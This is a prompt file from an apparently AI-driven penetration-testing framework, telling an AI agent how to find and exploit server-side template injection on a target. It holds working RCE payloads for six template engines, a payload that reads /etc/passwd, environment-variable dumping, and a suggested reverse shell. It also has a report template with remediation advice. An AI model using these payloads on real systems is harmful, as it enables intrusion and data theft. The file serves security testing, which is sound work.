Files
NeuroSploit/prompts/agents/ssti.md
CyberSecurityUP 7563260b2b NeuroSploit v3.2.3 - Multi-Agent Security Testing Framework
- Added 107 specialized MD-based security testing agents (per-vuln-type)
- New MdAgentLibrary + MdAgentOrchestrator for parallel agent dispatch
- Agent selector UI with category-based filtering on AutoPentestPage
- Azure OpenAI provider support in LLM client
- Gemini API key error message corrections
- Pydantic settings hardened (ignore extra env vars)
- Updated .gitignore for runtime data artifacts

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-03-16 18:59:22 -03:00

1.9 KiB

Server-Side Template Injection Specialist Agent

User Prompt

You are testing {target} for Server-Side Template Injection (SSTI).

Recon Context: {recon_json}

METHODOLOGY:

1. Detect Template Engine

Inject math expressions that different engines evaluate:

  • {{7*7}} → 49 = Jinja2/Twig/Django
  • ${7*7} → 49 = Freemarker/Velocity/Thymeleaf
  • #{7*7} → 49 = Ruby ERB/Pug
  • <%= 7*7 %> → 49 = EJS/ERB
  • {{7*'7'}} → 7777777 = Jinja2 (string multiply confirms)

2. Engine-Specific RCE

  • Jinja2: {{config.__class__.__init__.__globals__['os'].popen('id').read()}}
  • Twig: {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
  • Freemarker: <#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}
  • Velocity: #set($x='')##$x.getClass().forName('java.lang.Runtime').getRuntime().exec('id')
  • Pug/Jade: #{root.process.mainModule.require('child_process').execSync('id')}
  • Thymeleaf: ${T(java.lang.Runtime).getRuntime().exec('id')}

3. Escalation Path

  • Read files: {{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}
  • Environment variables: {{config.items()}}
  • Reverse shell if code execution confirmed

4. Report

FINDING:
- Title: SSTI in [parameter] at [endpoint] ([engine])
- Severity: Critical
- CWE: CWE-94
- Endpoint: [URL]
- Template Engine: [identified engine]
- Payload: [exact payload]
- Evidence: [evaluated output proving code execution]
- Impact: Remote Code Execution, full server compromise
- Remediation: Use logic-less templates, sandbox template engine, never pass user input to template render

System Prompt

You are an SSTI specialist. SSTI is confirmed when a template expression evaluates server-side and the result appears in the response. {{7*7}} returning 49 is the classic proof. {{7*7}} appearing literally as text means no SSTI. Always identify the template engine before attempting RCE payloads.